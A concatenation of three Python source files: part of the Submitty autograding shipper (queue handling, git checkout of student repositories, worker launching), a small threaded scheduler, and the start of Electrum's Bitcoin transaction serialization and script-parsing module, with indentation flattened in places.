os.remove(local_results_zip)
success = False
with contextlib.suppress(FileNotFoundError):
os.remove(local_done_queue_file)
msg = "Unpacked job from " + which_machine if success else "ERROR: failure returned from worker machine"
print(msg)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted, is_batch=is_batch, message=msg)
return True
# ==================================================================================
def grade_queue_file(my_name, which_machine,which_untrusted,queue_file):
"""
    Oversees the autograding of a single item from the queue
:param queue_file: details of what to grade
:param which_machine: name of machine to send this job to (might be "localhost")
:param which_untrusted: specific untrusted user for this autograding job
"""
my_dir,my_file=os.path.split(queue_file)
pid = os.getpid()
directory = os.path.dirname(os.path.realpath(queue_file))
name = os.path.basename(os.path.realpath(queue_file))
grading_file = os.path.join(directory, "GRADING_" + name)
#TODO: break which_machine into id, address, and passphrase.
try:
# prepare the job
shipper_counter=0
#prep_job_success = prepare_job(my_name,which_machine, which_untrusted, my_dir, queue_file)
while not prepare_job(my_name,which_machine, which_untrusted, my_dir, queue_file):
time.sleep(5)
prep_job_success = True
if not prep_job_success:
print (my_name, " ERROR unable to prepare job: ", queue_file)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR unable to prepare job: " + queue_file)
else:
# then wait for grading to be completed
shipper_counter=0
while not unpack_job(which_machine, which_untrusted, my_dir, queue_file):
shipper_counter+=1
time.sleep(1)
if shipper_counter >= 10:
print (my_name,which_untrusted,"shipper wait for grade: ",queue_file)
shipper_counter=0
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print (my_name, " ERROR attempting to grade item: ", queue_file, " exception=",str(e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR attempting to grade item: " + queue_file + " exception " + repr(e))
# note: not necessary to acquire lock for these statements, but
# make sure you remove the queue file, then the grading file
try:
os.remove(queue_file)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print (my_name, " ERROR attempting to remove queue file: ", queue_file, " exception=",str(e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR attempting to remove queue file: " + queue_file + " exception=" + str(e))
try:
os.remove(grading_file)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print (my_name, " ERROR attempting to remove grading file: ", grading_file, " exception=",str(e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR attempting to remove grading file: " + grading_file + " exception=" + str(e))
# ==================================================================================
# ==================================================================================
def valid_github_user_id(userid):
# Github username may only contain alphanumeric characters or
# hyphens. Github username cannot have multiple consecutive
# hyphens. Github username cannot begin or end with a hyphen.
# Maximum is 39 characters.
#
# NOTE: We only scrub the input for allowed characters.
if (userid==''):
# GitHub userid cannot be empty
return False
checklegal = lambda char: char.isalnum() or char == '-'
filtered_userid = ''.join(list(filter(checklegal,userid)))
if not userid == filtered_userid:
return False
return True
def valid_github_repo_id(repoid):
# Only characters, numbers, dots, minus and underscore are allowed.
if (repoid==''):
# GitHub repoid cannot be empty
return False
checklegal = lambda char: char.isalnum() or char == '.' or char == '-' or char == '_'
filtered_repoid = ''.join(list(filter(checklegal,repoid)))
if not repoid == filtered_repoid:
return False
return True
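# Editor's sketch (hypothetical helper, not called anywhere): what the two
# validators above accept. As the NOTE says, only the character set is checked,
# so a name with leading/trailing/repeated hyphens still passes.
def _example_github_id_checks():
    assert valid_github_user_id("octo-cat")
    assert not valid_github_user_id("octo cat")   # space is filtered out, so it fails
    assert not valid_github_user_id("")
    assert valid_github_repo_id("my_repo.v2")
    assert not valid_github_repo_id("my repo")
    return True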
def checkout_vcs_repo(my_file):
print ("SHIPPER CHECKOUT VCS REPO ", my_file)
with open(my_file, 'r') as infile:
obj = json.load(infile)
partial_path = os.path.join(obj["gradeable"],obj["who"],str(obj["version"]))
course_dir = os.path.join(SUBMITTY_DATA_DIR, "courses", obj["semester"], obj["course"])
submission_path = os.path.join(course_dir, "submissions", partial_path)
checkout_path = os.path.join(course_dir, "checkout", partial_path)
results_path = os.path.join(course_dir, "results", partial_path)
is_vcs,vcs_type,vcs_base_url,vcs_subdirectory = packer_unpacker.get_vcs_info(SUBMITTY_DATA_DIR,obj["semester"],obj["course"],obj["gradeable"],obj["who"],obj["team"])
# cleanup the previous checkout (if it exists)
shutil.rmtree(checkout_path,ignore_errors=True)
os.makedirs(checkout_path, exist_ok=True)
job_id = "~VCS~"
try:
# If we are public or private github, we will have an empty vcs_subdirectory
if vcs_subdirectory == '':
with open (os.path.join(submission_path,".submit.VCS_CHECKOUT")) as submission_vcs_file:
VCS_JSON = json.load(submission_vcs_file)
git_user_id = VCS_JSON["git_user_id"]
git_repo_id = VCS_JSON["git_repo_id"]
if not valid_github_user_id(git_user_id):
raise Exception ("Invalid GitHub user/organization name: '"+git_user_id+"'")
if not valid_github_repo_id(git_repo_id):
raise Exception ("Invalid GitHub repository name: '"+git_repo_id+"'")
# construct path for GitHub
vcs_path="https://www.github.com/"+git_user_id+"/"+git_repo_id
# is vcs_subdirectory standalone or should it be combined with base_url?
elif vcs_subdirectory[0] == '/' or '://' in vcs_subdirectory:
vcs_path = vcs_subdirectory
else:
if '://' in vcs_base_url:
vcs_path = urllib.parse.urljoin(vcs_base_url, vcs_subdirectory)
else:
vcs_path = os.path.join(vcs_base_url, vcs_subdirectory)
# warning: --depth is ignored in local clones; use file:// instead.
if not '://' in vcs_path:
vcs_path = "file:///" + vcs_path
Path(results_path+"/logs").mkdir(parents=True, exist_ok=True)
checkout_log_file = os.path.join(results_path, "logs", "vcs_checkout.txt")
# grab the submission time
with open (os.path.join(submission_path,".submit.timestamp")) as submission_time_file:
submission_string = submission_time_file.read().rstrip()
# OPTION: A shallow clone with only the most recent commit
# from the submission timestamp.
#
# NOTE: if the student has set their computer time in the
# future, they could be confused that we don't grab their
# most recent code.
# NOTE: github repos currently fail (a bug?) with an error when
# --shallow-since is used:
# "fatal: The remote end hung up unexpectedly"
#
#clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--shallow-since='+submission_string, '-b', 'master']
# OPTION: A shallow clone, with just the most recent commit.
#
# NOTE: If the server is busy, it might take seconds or
# minutes for an available shipper to process the git
        # clone, and the timestamp might be slightly late.
#
# So we choose this option! (for now)
#
clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--depth', '1', '-b', 'master']
with open(checkout_log_file, 'a') as f:
print("VCS CHECKOUT", file=f)
print('vcs_base_url', vcs_base_url, file=f)
print('vcs_subdirectory', vcs_subdirectory, file=f)
print('vcs_path', vcs_path, file=f)
print(' '.join(clone_command), file=f)
print("\n====================================\n", file=f)
# git clone may fail -- because repository does not exist,
# or because we don't have appropriate access credentials
try:
subprocess.check_call(clone_command)
os.chdir(checkout_path)
# determine which version we need to checkout
# if the repo is empty or the master branch does not exist, this command will fail
try:
what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', 'master'])
# old method: when we had the full history, roll-back to a version by date
#what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', '--before="'+submission_string+'"', 'master'])
what_version = str(what_version.decode('utf-8')).rstrip()
if what_version == "":
# oops, pressed the grade button before a valid commit
shutil.rmtree(checkout_path, ignore_errors=True)
# old method:
#else:
# # and check out the right version
# subprocess.call(['git', 'checkout', '-b', 'grade', what_version])
subprocess.call(['ls', '-lR', checkout_path], stdout=open(checkout_log_file, 'a'))
print("\n====================================\n", file=open(checkout_log_file, 'a'))
subprocess.call(['du', '-skh', checkout_path], stdout=open(checkout_log_file, 'a'))
obj['revision'] = what_version
# exception on git rev-list
except subprocess.CalledProcessError as error:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message="ERROR: failed to determine version on master branch " + str(error))
os.chdir(checkout_path)
with open(os.path.join(checkout_path,"failed_to_determine_version_on_master_branch.txt"),'w') as f:
print(str(error),file=f)
print("\n",file=f)
print("Check to be sure the repository is not empty.\n",file=f)
print("Check to be sure the repository has a master branch.\n",file=f)
print("And check to be sure the timestamps on the master branch are reasonable.\n",file=f)
# exception on git clone
except subprocess.CalledProcessError as error:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message="ERROR: failed to clone repository " + str(error))
os.chdir(checkout_path)
with open(os.path.join(checkout_path,"failed_to_clone_repository.txt"),'w') as f:
print(str(error),file=f)
print("\n",file=f)
print("Check to be sure the repository exists.\n",file=f)
print("And check to be sure the submitty_daemon user has appropriate access credentials.\n",file=f)
# exception in constructing full git repository url/path
except Exception as error:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message="ERROR: failed to construct valid repository url/path" + str(error))
os.chdir(checkout_path)
with open(os.path.join(checkout_path,"failed_to_construct_valid_repository_url.txt"),'w') as f:
print(str(error),file=f)
print("\n",file=f)
print("Check to be sure the repository exists.\n",file=f)
print("And check to be sure the submitty_daemon user has appropriate access credentials.\n",file=f)
return obj
# ==================================================================================
def get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock):
"""
Picks a job from the queue
:param overall_lock: a lock on the directory containing all queue files
"""
time_get_job_begin = dateutils.get_current_time()
with overall_lock:
folder= INTERACTIVE_QUEUE
'''
----------------------------------------------------------------
Our first priority is to perform any awaiting VCS checkouts
Note: This design is imperfect:
* If all shippers are busy working on long-running autograding
tasks there will be a delay of seconds or minutes between
a student pressing the submission button and clone happening.
This is a minor exploit allowing them to theoretically
continue working on their submission past the deadline for
the time period of the delay.
-- This is not a significant, practical problem.
* If multiple and/or large git submissions arrive close
together, this shipper job will be tied up performing these
clone operations. Because we don't release the lock, any
other shippers that complete their work will also be blocked
from either helping with the clones or tackling the next
autograding job.
-- Based on experience with actual submission patterns, we
do not anticipate that this will be a significant
bottleneck at this time.
* If a git clone takes a very long time and/or hangs because of
network problems, this could halt all work on the server.
-- We'll need to monitor the production server.
We plan to do a complete overhaul of the
scheduler/shipper/worker and refactoring this design should be
part of the project.
----------------------------------------------------------------
'''
# Grab all the VCS files currently in the folder...
vcs_files = [str(f) for f in Path(folder).glob('VCS__*')]
for f in vcs_files:
vcs_file = f[len(folder)+1:]
no_vcs_file = f[len(folder)+1+5:]
# do the checkout
updated_obj = checkout_vcs_repo(folder+"/"+vcs_file)
# save the regular grading queue file
with open(os.path.join(folder,no_vcs_file), "w") as queue_file:
json.dump(updated_obj, queue_file)
# cleanup the vcs queue file
os.remove(folder+"/"+vcs_file)
# ----------------------------------------------------------------
# Grab all the files currently in the folder, sorted by creation
# time, and put them in the queue to be graded
files = [str(f) for f in Path(folder).glob('*')]
files_and_times = list()
for f in files:
try:
my_time = os.path.getctime(f)
except:
continue
tup = (f, my_time)
files_and_times.append(tup)
files_and_times = sorted(files_and_times, key=operator.itemgetter(1))
my_job=""
for full_path_file, file_time in files_and_times:
# get the file name (without the path)
just_file = full_path_file[len(folder)+1:]
# skip items that are already being graded
if (just_file[0:8]=="GRADING_"):
continue
grading_file = os.path.join(folder,"GRADING_"+just_file)
if grading_file in files:
continue
# skip items (very recently added!) that are already waiting for a VCS checkout
if (just_file[0:5]=="VCS__"):
continue
# found something to do
try:
with open(full_path_file, 'r') as infile:
queue_obj = json.load(infile)
except:
continue
#Check to make sure that we are capable of grading this submission
required_capabilities = queue_obj["required_capabilities"]
if not required_capabilities in my_capabilities:
continue
# prioritize interactive jobs over (batch) regrades
# if you've found an interactive job, exit early (since they are sorted by timestamp)
if not "regrade" in queue_obj or not queue_obj["regrade"]:
my_job = just_file
break
# otherwise it's a regrade, and if we don't already have a
# job, take it, but we have to search the rest of the list
if my_job == "":
my_job = just_file
if not my_job == "":
grading_file = os.path.join(folder, "GRADING_" + my_job)
# create the grading file
with open(os.path.join(grading_file), "w") as queue_file:
json.dump({"untrusted": which_untrusted, "machine": which_machine}, queue_file)
time_get_job_end = dateutils.get_current_time()
time_delta = time_get_job_end-time_get_job_begin
if time_delta > datetime.timedelta(milliseconds=100):
print (my_name, " WARNING: submitty_autograding shipper get_job time ", time_delta)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" WARNING: submitty_autograding shipper get_job time "+str(time_delta))
return (my_job)
# ==================================================================================
# ==================================================================================
def shipper_process(my_name,my_data,full_address,which_untrusted,overall_lock):
"""
Each shipper process spins in a loop, looking for a job that
matches the capabilities of this machine, and then oversees the
autograding of that job. Interactive jobs are prioritized over
    batch (regrade) jobs. If no jobs are available, the shipper sleeps
    briefly and then polls the queue again.
"""
which_machine = full_address
my_capabilities = my_data[my_name]['capabilities']
# ignore keyboard interrupts in the shipper processes
signal.signal(signal.SIGINT, signal.SIG_IGN)
counter=0
while True:
try:
my_job = get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock)
if not my_job == "":
counter=0
grade_queue_file(my_name,which_machine,which_untrusted,os.path.join(INTERACTIVE_QUEUE,my_job))
continue
else:
if counter == 0 or counter >= 10:
print ("{0} {1}: no available job".format(my_name, which_untrusted))
counter=0
counter+=1
time.sleep(1)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
my_message = "ERROR in get_job {0} {1} {2}. For more details, see traces entry".format(which_machine,which_untrusted,str(e))
print (my_message)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=my_message)
time.sleep(1)
# ==================================================================================
# ==================================================================================
def launch_shippers(worker_status_map):
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="grade_scheduler.py launched")
# Clean up old files from previous shipping/autograding (any
# partially completed work will be re-done)
for file_path in Path(INTERACTIVE_QUEUE).glob("GRADING_*"):
file_path = str(file_path)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Remove old queue file: " + file_path)
os.remove(file_path)
for file_path in Path(SUBMITTY_DATA_DIR, "autograding_TODO").glob("untrusted*"):
file_path = str(file_path)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Remove autograding TODO file: " + file_path)
os.remove(file_path)
for file_path in Path(SUBMITTY_DATA_DIR, "autograding_DONE").glob("*"):
file_path = str(file_path)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Remove autograding DONE file: " + file_path)
os.remove(file_path)
# this lock will be used to edit the queue or new job event
overall_lock = multiprocessing.Lock()
# The names of the worker machines, the capabilities of each
# worker machine, and the number of workers per machine are stored
# in the autograding_workers json.
try:
autograding_workers_path = os.path.join(SUBMITTY_INSTALL_DIR, 'config', "autograding_workers.json")
with open(autograding_workers_path, 'r') as infile:
autograding_workers = json.load(infile)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
raise SystemExit("ERROR: could not locate the autograding workers json: {0}".format(e))
# There must always be a primary machine, it may or may not have
# autograding workers.
if not "primary" in autograding_workers:
raise SystemExit("ERROR: autograding_workers.json contained no primary machine.")
# One (or more) of the machines must accept "default" jobs.
default_present = False
for name, machine in autograding_workers.items():
if "default" in machine["capabilities"]:
default_present = True
break
if not default_present:
raise SystemExit("ERROR: autograding_workers.json contained no machine with default capabilities")
# Launch a shipper process for every worker on the primary machine and each worker machine
total_num_workers = 0
processes = list()
for name, machine in autograding_workers.items():
if worker_status_map[name] == False:
print("{0} could not be reached, so we are not spinning up shipper threads.".format(name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="{0} could not be reached, so we are not spinning up shipper threads.".format(name))
continue
if 'enabled' in machine and machine['enabled'] == False:
print("{0} is disabled, so we are not spinning up shipper threads.".format(name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="{0} is disabled, so we are not spinning up shipper threads.")
continue
try:
full_address = ""
if machine["address"] != "localhost":
if machine["username"] == "":
raise SystemExit("ERROR: empty username for worker machine {0} ".format(machine["address"]))
full_address = "{0}@{1}".format(machine["username"], machine["address"])
else:
if not machine["username"] == "":
raise SystemExit('ERROR: username for primary (localhost) must be ""')
full_address = machine['address']
num_workers_on_machine = machine["num_autograding_workers"]
if num_workers_on_machine < 0:
raise SystemExit("ERROR: num_workers_on_machine for '{0}' must be non-negative.".format(machine))
single_machine_data = {name : machine}
single_machine_data = add_fields_to_autograding_worker_json(single_machine_data, name)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print("ERROR: autograding_workers.json entry for {0} contains an error: {1}. For more details, see trace entry.".format(name, e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: autograding_workers.json entry for {0} contains an error: {1} For more details, see trace entry.".format(name,e))
continue
# launch the shipper threads
for i in range(0,num_workers_on_machine):
u = "untrusted" + str(i).zfill(2)
p = multiprocessing.Process(target=shipper_process,args=(name,single_machine_data,full_address, u,overall_lock))
p.start()
processes.append(p)
total_num_workers += num_workers_on_machine
# main monitoring loop
try:
while True:
alive = 0
for i in range(0,total_num_workers):
                if processes[i].is_alive():
alive = alive+1
else:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: process "+str(i)+" is not alive")
if alive != total_num_workers:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: #shippers="+str(total_num_workers)+" != #alive="+str(alive))
#print ("shippers= ",total_num_workers," alive=",alive)
time.sleep(1)
except KeyboardInterrupt:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="grade_scheduler.py keyboard interrupt")
# just kill everything in this group id right now
        # NOTE: this may be a bug if the grandchildren have a different group id, since they will not be killed
os.kill(-os.getpid(), signal.SIGKILL)
# run this to check if everything is dead
# ps xao pid,ppid,pgid,sid,comm,user | grep untrust
# everything's dead, including the main process so the rest of this will be ignored
# but this was mostly working...
# terminate the jobs
for i in range(0,total_num_workers):
processes[i].terminate()
# wait for them to join
for i in range(0,total_num_workers):
processes[i].join()
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="grade_scheduler.py terminated")
# ==================================================================================
if __name__ == "__main__":
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
worker_status_map = update_all_foreign_autograding_workers()
launch_shippers(worker_status_map)
|
scheduler.py
|
import sched
from threading import Thread
import time
s = sched.scheduler(time.time, time.sleep)
def schedule_event(func: callable, delay: int, priority: int):
s.enter(delay, priority, func)
def run_scheduler():
t = Thread(target=s.run)
t.start()
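# Editor's sketch (usage example, not part of the original module): schedule a
# callable to fire after a delay, then start the scheduler on its own thread so
# the caller is not blocked while the event queue drains.
if __name__ == "__main__":
    def tick():
        print("tick")
    schedule_event(tick, delay=2, priority=1)
    run_scheduler()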
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != chr(0)
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(chr(1) if val else chr(0))
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
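# Editor's sketch (hypothetical helper, not used elsewhere): round-trip of the
# compact-size encoding described in read_string() above. Values up to 252 take
# a single byte; larger values get a 0xfd/0xfe/0xff marker plus a 2-, 4- or
# 8-byte little-endian length.
def _example_compact_size_roundtrip(value=253):
    ds = BCDataStream()
    ds.write_compact_size(value)
    return ds.read_compact_size() == value  # True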
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(_bytes):
    return _bytes.hex()
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(_bytes):
    t = _bytes.hex()
    if len(t) < 11:
        return t
    return t[0:4]+"..."+t[-4:]
def script_GetOp(_bytes):
i = 0
blen = len(_bytes)
while i < blen:
vch = None
opcode = _bytes[i]
i += 1
if opcode <= opcodes.OP_PUSHDATA4:
nSize = opcode
if opcode == opcodes.OP_PUSHDATA1:
nSize = _bytes[i] if i < blen else 0
i += 1
elif opcode == opcodes.OP_PUSHDATA2:
(nSize,) = struct.unpack_from('<H', _bytes, i) if i+2 <= blen else (0,) # tolerate truncated script
i += 2
elif opcode == opcodes.OP_PUSHDATA4:
(nSize,) = struct.unpack_from('<I', _bytes, i) if i+4 <= blen else (0,)
i += 4
vch = _bytes[i:i + nSize] # array slicing here never throws exception even if truncated script
i += nSize
yield opcode, vch, i
def script_GetOpName(opcode):
return (opcodes.whatis(opcode)).replace("OP_", "")
def decode_script(bytes):
result = ''
for (opcode, vch, i) in script_GetOp(bytes):
if len(result) > 0: result += " "
if opcode <= opcodes.OP_PUSHDATA4:
result += "%d:"%(opcode,)
result += short_hex(vch)
else:
result += script_GetOpName(opcode)
return result
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
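# Editor's sketch (hypothetical helper, not used elsewhere): match_decoded()
# treats every data push as equivalent to OP_PUSHDATA4, so a typical p2pkh
# scriptSig (one push for the signature, one for the pubkey) matches a
# two-push template.
def _example_match_p2pkh_scriptsig():
    script = bytes([2, 0xab, 0xcd]) + bytes([3, 0x01, 0x02, 0x03])  # two small data pushes
    decoded = list(script_GetOp(script))
    return match_decoded(decoded, [opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4])  # True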
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = list(script_GetOp(_bytes))
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
# added to suppress print_error statements during lib/test_slp_consensus.py (uses 'fake' transactions that have empty scriptSig)
if len(decoded) == 0:
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = [ x for x in script_GetOp(s) ]
    # the following throws an exception when the redeemscript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput.protocol_factory(bytes(_bytes))
